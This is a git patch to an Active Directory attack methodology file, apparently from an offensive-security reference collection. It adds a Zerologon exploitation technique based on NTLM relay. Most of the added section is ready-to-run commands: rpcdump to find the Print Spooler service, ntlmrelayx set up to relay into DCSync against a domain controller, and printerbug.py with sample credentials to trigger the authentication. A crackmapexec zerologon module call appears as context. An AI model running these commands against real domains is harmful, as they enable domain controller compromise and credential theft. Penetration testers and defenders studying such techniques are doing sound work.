From 8caba394d5d203b007994fcde45157421d09d613 Mon Sep 17 00:00:00 2001 From: Darktortue Date: Tue, 10 Jan 2023 11:23:45 +0100 Subject: [PATCH] Added zerologon authentication relay technique --- .../Active Directory Attack.md | 22 ++++++++++++++++++- 1 file changed, 21 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index f3d8eba..86f962d 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -661,6 +661,26 @@ Exploit steps from the white paper ```powershell crackmapexec smb 10.10.10.10 -u username -p password -d domain -M zerologon ``` + +A 2nd approach to exploit zerologon is done by relaying authentication. + +This technique, [found by dirkjanm](https://dirkjanm.io/a-different-way-of-abusing-zerologon), requires more prerequisites but has the advantage of having no impact on service continuity. +The following prerequisites are needed: +* A domain account +* One DC running the `PrintSpooler` service +* Another DC vulnerable to zerologon + +* `ntlmrelayx` - from Impacket and any tool such as [`printerbug.py`](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) + ```powershell + # Check if one DC is running the PrintSpooler service + rpcdump.py 10.10.10.10 | grep -A 6 "spoolsv" + + # Setup ntlmrelay in one shell + ntlmrelayx.py -t dcsync://DC01.LAB.LOCAL -smb2support + + #Trigger printerbug in 2nd shell + python3 printerbug.py 'LAB.LOCAL'/joe:Password123@10.10.10.10 10.10.10.12 + ``` #### PrintNightmare @@ -4148,4 +4168,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability) * [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/) * [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/) -* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf) \ No newline at end of file +* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf)